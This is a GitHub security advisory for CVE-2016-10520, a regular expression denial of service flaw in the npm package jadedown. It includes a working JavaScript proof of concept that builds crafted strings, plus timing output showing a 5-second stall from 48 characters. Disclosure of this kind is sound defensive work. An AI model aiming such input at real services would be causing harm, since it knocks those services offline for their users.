Skip to content

Regular Expression Denial of Service in jadedown

Low severity GitHub Reviewed Published Feb 18, 2019 to the GitHub Advisory Database • Updated Sep 11, 2023

Package

npm jadedown (npm)

Affected versions

<= 0.0.3

Patched versions

None

Description

The jadedown package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in.

Proof of concept

var jadedown = require('jadedown');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=1;i<=10000000;i=i+1) {
    console.log("COUNT: " + i);
    var str = genstr(i, 'f') + genstr(i, '#') + '{';
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    jadedown(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results demonstrating blocking for 5 seconds using only 48 characters.

$ node jadedown.js
COUNT: 1
LENGTH: 6
[ 0, 4014065 ]
COUNT: 4
LENGTH: 12
[ 0, 503507 ]
COUNT: 7
LENGTH: 18
[ 0, 325225 ]
COUNT: 10
LENGTH: 24
[ 0, 1632684 ]
COUNT: 13
LENGTH: 30
[ 0, 7541230 ]
COUNT: 16
LENGTH: 36
[ 0, 80889495 ]
COUNT: 19
LENGTH: 42
[ 0, 636009936 ]
COUNT: 22
LENGTH: 48
[ 5, 820586760 ]

Timeline

  • October 24, 2015 - Vulnerability Identified
  • October 24, 2015 - Maintainers Notified
  • October 25, 2015 - Response from Maintainers with intent to fix
  • January 5, 2016 - Advisory Published
  • January 11, 2016 - CVE Requested

Recommendation

This package is not actively maintained, and has not seen an update since 2011.

The package also provides unique functionality in the form of a templating language that is not available elsewhere. If this package is used to process user input, the best available mitigation is to refactor the dependent application to not make use of this module.

References

Published to the GitHub Advisory Database Feb 18, 2019
Reviewed Jun 16, 2020
Last updated Sep 11, 2023

Severity

Low

EPSS score

0.100%
(42nd percentile)

Weaknesses

CVE ID

CVE-2016-10520

GHSA ID

GHSA-6354-6mhv-mvv5

Source code

No known source code
Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.